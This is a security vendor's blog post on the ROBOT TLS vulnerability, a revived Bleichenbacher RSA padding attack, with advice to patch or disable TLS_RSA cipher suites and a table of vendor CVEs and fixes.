Yesterday a 19-old vulnerability called ROBOT was “rediscovered”. The vulnerability is a major live weakness in the implementation of SSL/TLS cipher suites where a RSA algorithm is used for encryption key exchange. The issue was published by: Hanno Böck, Juraj Somorovsky of Ruhr-Universitat Bochum/Hackmanit GmbH, and Craig Young of Tripwire VERT, who created a dedicated website describing the problem and its implications.

The ROBOT vulnerability was originally discovered by Daniel Bleichenbacher in 1998 as an error in implementation of PKCS #1 1.5 padding as an “adaptive-chosen ciphertext attack” that in practical terms allowed to decrypt SSL communication if RSA algorithm is used for encryption.

Although Daniel Bleichenbacher published the details of his research and proof of concept 19 years ago the designers of TLS decided to implement insufficient and incomplete workaround rather than re-designing the protocol as to eliminate the issue permanently.

Steps to take

HTTPS admins are advised to update their www servers immediately, and if a fix is not available, to disable the ciphers suites that use RSA for encryption of key exchange. The below table lists current available patches that are available from different vendors. It is worth remembering that the vulnerability does not allow the retrieval of the private key from the server but only to decrypt the messages and as a result ciphers where RSA is used for signatures only are safe to use still. So all ciphers with DHE (Diffie Hellman) or ECDHE (Elliptic Curve Diffie Hellman) for Key Exchange are still secure

It is advised to install the latest patches from vendors, and/or disable all ciphers that start with “TLS_RSA”. According to Cloudflare less than 1% of all traffic is encrypted with affected ciphers (TLS_RSA), so there should be minimal impact on your customers that connect over HTTPS protocol.

F5BIG-IP SSL vulnerabilityCVE-2017-6168
CitrixTLS Padding Oracle Vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler GatewayCVE-2017-17382
RadwareSecurity Advisory: Adaptive chosen-ciphertext attack vulnerabilityCVE-2017-17427
Cisco ACEBleichenbacher Attack on TLS Affecting Cisco Products, End-of-Sale and End-of-LifeCVE-2017-17428
Bouncy CastleFix in 1.59 beta 9, Patch / CommitCVE-2017-13098
ErlangOTP, OTP, OTP 20.1.7CVE-2017-1000385
WolfSSLGithub PR / patchCVE-2017-13099
MatrixSSLChanges in 3.8.3CVE-2016-6883
Java / JSSEOracle Critical Patch Update Advisory – October 2012CVE-2012-5081



If your organisation is impacted by this vulnerability or you want to raise awareness among your employees then please contact Sysnet, we have the experience and the expertise.

Request a Callback

Subscribe to our blog